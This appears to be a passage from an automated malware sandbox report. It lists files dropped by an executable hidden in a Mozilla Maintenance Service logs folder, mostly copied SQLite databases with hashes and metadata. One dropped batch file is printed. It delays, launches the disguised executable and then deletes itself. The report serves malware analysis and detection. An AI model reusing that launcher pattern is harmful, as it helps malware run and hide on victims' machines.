                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RNsIYPXwnq

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RX1843IOhi

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RgXqeoXDE5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\S6oj13RoS9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SGooaMvTXm

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\STGc8MWTk0

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SYMnTiC9f5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Sjne7Ua1PB

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\T2dq12s2Ht

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\T7T0P50D7R

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\T9SsDuTNyk

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TYcTSF6YSE

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.403856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:zVIn/6HTJ8CV:BHT+W
                                                                    MD5:2CD5CEDE4BCB812A62DBD10315DD91F3
                                                                    SHA1:F399F8A2D9EC73A5DC1AA962768B1CFCC17D1CBE
                                                                    SHA-256:8C6C71D8EEF7DC5463290A30E851D4615BF4631537A665CCCAC484D60B8C44EC
                                                                    SHA-512:CE6762BC5C64EDA1813A3862903D464554004A548717232D026989533BD3671AC0DD1FB53AB8639BD16756E552FED08C9A6EFDDE1B8DA9EF40895C6F2EA6263A
                                                                    Malicious:false
                                                                    Preview:esmtQovLcjqZFcb6GXM06I8g0

                                                                    C:\Users\user\AppData\Local\Temp\TemqUyjyHX

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ThEM2buP54

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TmQ8VfuyUq

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\U408Hj3Law

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UBCm0dtHJ3

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UNGtkmLe0G

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UZtwFzIIoy

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):215
                                                                    Entropy (8bit):5.329312395326485
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCRLuVFOOr+DER5IlMx5siWNCG7bKOZG1923f1QHfqn:CuVEOCDEfPDWNndtQHC
                                                                    MD5:9CB902672A8C851F4A3767BD7C971C99
                                                                    SHA1:06211A845087A5C86BC726B24F5716738321C3B2
                                                                    SHA-256:9BD41C73810395814FD1CFC92CB262DAE968C85C8C23EE30DA252E36A92647FB
                                                                    SHA-512:CF9C75882404D09A6FA76842B5769F0953F976E41B8042656C2E467AA570B3D3F2ADEDBD2B46AB85D0FEA5FD0B3F6742773544A0CBD92A00CCE036CB305EDE97
                                                                    Malicious:false
                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Uhg5bQrQMo.bat"

                                                                    C:\Users\user\AppData\Local\Temp\UlyLwYWR7H

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UnMvWD7Pto

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\V41s0D4VPw

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VGPU8QeqXy

